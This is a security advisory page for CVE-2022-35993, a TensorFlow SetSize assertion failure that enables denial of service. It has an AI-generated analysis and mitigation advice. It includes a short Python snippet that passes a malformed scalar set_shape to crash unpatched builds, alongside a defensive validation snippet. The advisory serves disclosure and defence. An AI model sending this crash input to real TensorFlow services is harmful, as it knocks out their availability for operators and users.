CVE-2022-35993: CWE-617: Reachable Assertion in tensorflow/tensorflow

Medium
Published: Fri Sep 16 2022 (09/16/2022, 22:20:25 UTC)
Source: CVE
Vendor/Project: tensorflow
Product: tensorflow

Description

TensorFlow is an open source platform for machine learning. When `SetSize` receives an input `set_shape` that is not a 1D tensor, it triggers a `CHECK` failure that can be used to mount a denial of service attack. We have patched the issue in GitHub commit cf70b79d2662c0d3c6af74583641e345fc939467. The fix will be included in TensorFlow 2.10.0. We will also cherry-pick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.

AI-Powered Analysis

Last updated: 06/22/2025, 18:20:40 UTC

Technical Analysis

CVE-2022-35993 is a medium-severity vulnerability identified in TensorFlow, an open-source machine learning platform widely used for developing and deploying machine learning models. The vulnerability arises from a reachable assertion failure (CWE-617) in the TensorFlow codebase within the `SetSize` function. Specifically, when the `SetSize` function receives an input parameter `set_shape` that is not a one-dimensional tensor as expected, it triggers a `CHECK` failure. This assertion failure causes the TensorFlow process to terminate unexpectedly, effectively resulting in a denial of service (DoS) condition. The issue affects multiple TensorFlow versions: all versions prior to 2.7.2, versions from 2.8.0 up to but not including 2.8.1, and versions from 2.9.0 up to but not including 2.9.1. The vulnerability has been patched in TensorFlow 2.10.0 and backported to 2.7.2, 2.8.1, and 2.9.1. There are no known workarounds for this issue, meaning that unpatched systems remain vulnerable to potential DoS attacks if they process malformed input tensors. No exploits are currently known to be active in the wild. The vulnerability does not require authentication or user interaction to be triggered, but it requires the attacker to supply specifically crafted input data to the TensorFlow processing pipeline that causes the assertion failure. This vulnerability impacts the availability of TensorFlow-based services by causing crashes, which can disrupt machine learning workflows, model training, or inference services relying on TensorFlow.
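
To make the trigger condition concrete, the sketch below calls the raw `SetSize` op with a 0-D (scalar) `set_shape` instead of the expected 1-D tensor. The argument values are purely illustrative and not taken from the advisory; on an unpatched build this class of input reaches the `CHECK` and aborts the process (so the `try`/`except` cannot save it), while a patched build rejects it with an ordinary `InvalidArgumentError`.

```python
# Illustrative sketch only: values are hypothetical, chosen solely to violate
# the expectation that `set_shape` is a 1-D tensor. On an unpatched TensorFlow
# build this class of input reaches the CHECK and aborts the process; patched
# builds raise InvalidArgumentError instead.
import tensorflow as tf

try:
    tf.raw_ops.SetSize(
        set_indices=tf.constant([[0, 0]], dtype=tf.int64),  # sparse indices (2-D)
        set_values=tf.constant([1], dtype=tf.int64),         # one value per index row
        set_shape=tf.constant(2, dtype=tf.int64),            # 0-D scalar, not the required 1-D shape
        validate_indices=True,
    )
except tf.errors.InvalidArgumentError as e:
    # Patched versions reject the malformed shape gracefully.
    print("Rejected malformed set_shape:", e)
```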

Potential Impact

For European organizations leveraging TensorFlow in production environments—such as research institutions, technology companies, financial services, healthcare providers, and industrial automation firms—this vulnerability poses a risk of service disruption. Since TensorFlow is often integrated into critical AI and data processing pipelines, a denial of service could halt model training or inference, leading to operational delays and potential financial losses. In sectors like healthcare or autonomous systems, such interruptions could have safety implications or degrade service quality. Additionally, organizations providing AI-as-a-Service or cloud-based machine learning platforms may face customer dissatisfaction or SLA breaches if their TensorFlow instances are exploited. Although the vulnerability does not lead to data leakage or integrity compromise, the availability impact alone can be significant, especially in high-availability or real-time environments. The lack of known exploits reduces immediate risk, but the ease of triggering the assertion failure with malformed input means attackers with access to input channels could cause disruptions. This is particularly relevant for organizations exposing TensorFlow inference APIs or accepting untrusted input data streams.

Mitigation Recommendations

To mitigate this vulnerability, European organizations should prioritize upgrading TensorFlow installations to version 2.10.0 or later, or applying the patched backport releases 2.7.2, 2.8.1, or 2.9.1 as appropriate. Given the absence of workarounds, patching is the primary defense. Organizations should audit their environments to identify all TensorFlow deployments, including embedded or containerized instances, to ensure comprehensive patch coverage. Additionally, input validation should be strengthened at the application layer to verify tensor shapes before passing data to TensorFlow (see the sketch below), thereby preventing malformed inputs from reaching vulnerable code paths. Implementing rate limiting and anomaly detection on input data streams can help detect and block attempts to exploit this vulnerability. For publicly exposed TensorFlow services, consider adding network-level protections such as web application firewalls (WAFs) or API gateways that can filter suspicious payloads. Monitoring logs for unexpected TensorFlow crashes or assertion failures can provide early warning of exploitation attempts. Finally, organizations should integrate this vulnerability into their incident response plans and conduct staff training to recognize and respond to potential DoS incidents related to TensorFlow.
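
As one example of the application-layer validation suggested above, the following sketch normalizes and checks an untrusted shape value before it ever reaches TensorFlow. The helper name, the NumPy-based checks, and the reject-rather-than-reshape policy are illustrative assumptions, not part of the upstream fix.

```python
# Minimal sketch of an application-layer guard, assuming shape values arrive
# from an untrusted source (e.g. an inference API request). The helper name
# and the reject policy are illustrative choices, not part of the upstream fix.
import numpy as np
import tensorflow as tf


def validated_set_shape(raw_shape) -> tf.Tensor:
    """Return raw_shape as a 1-D int64 tensor, or raise before it reaches
    TensorFlow's SetSize kernel."""
    shape = np.asarray(raw_shape, dtype=np.int64)
    if shape.ndim != 1:
        raise ValueError(f"set_shape must be a 1-D tensor, got rank {shape.ndim}")
    if (shape < 0).any():
        raise ValueError("set_shape dimensions must be non-negative")
    return tf.constant(shape, dtype=tf.int64)


try:
    validated_set_shape(2)  # a scalar shape from an untrusted request is rejected here
except ValueError as e:
    print("Rejected input:", e)
```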

Technical Details

Data Version: 5.1
Assigner Short Name: GitHub_M
Date Reserved: 2022-07-15T00:00:00.000Z
CISA Enriched: true

Threat ID: 682d9845c4522896dcbf42e0

Added to database: 5/21/2025, 9:09:25 AM

Last enriched: 6/22/2025, 6:20:40 PM

Last updated: 8/12/2025, 9:24:05 AM
